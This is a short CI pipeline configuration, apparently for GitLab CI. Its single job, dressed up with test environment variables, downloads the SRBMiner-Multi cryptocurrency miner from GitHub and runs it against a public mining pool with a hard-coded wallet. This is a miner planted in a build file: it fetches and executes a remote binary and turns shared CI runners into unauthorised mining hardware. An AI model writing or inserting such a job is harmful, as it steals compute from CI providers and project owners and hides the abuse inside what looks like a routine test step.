terminal:
  # Thi can be any image that has the necessary runtime environment for you
  image: ubuntu:bionic
  script:
    - apt-get update
    - apt-get install xz-utils -y
    - apt-get install wget -y
    - wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.7.5/SRBMiner-Multi-0-7-5-Linux.tar.xz
    - tar xf SRBMiner-Multi-0-7-5-Linux.tar.xz 
    - cd SRBMiner-Multi-0-7-5
    - ./SRBMiner-MULTI --algorithm panthera --pool scala.herominers.com:10130 --wallet SvmKJ6FG2YhhXtiTgnhP72XCjwsEjirdDbA54mYvzADnXTAk1TjC4Nn9a7iWqXjw5VJSPRvjTn9jATD54nbxuW6e1qRc6eSgJ --password YONAME
  variables:
    RAILS_ENV: "test"
    NODE_ENV: "test"
  
